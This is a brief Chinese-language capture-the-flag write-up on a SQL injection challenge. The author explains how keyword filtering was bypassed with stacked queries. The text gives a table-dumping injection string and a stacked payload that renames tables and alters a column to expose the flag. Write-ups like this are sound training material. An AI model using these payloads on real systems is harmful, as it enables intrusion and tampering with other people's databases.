这题和[SUCTF 2019]EasySQL类似,都可以使用堆叠注入
用1' or 1=1#可以爆出所有表内容
先尝试联合查询注入
过滤了select,where等等,使用堆叠注入
再看表
看下1919810931114514表
发现flag在里面,但是没办法查询,先看看word表
可以看见有字段id和data,这里应猜测查询语句
selsect id,data from words where id =
根据查询语句来改掉字段的名字
把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1' or 1=1#爆出表所有内容就可以查flag啦
0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#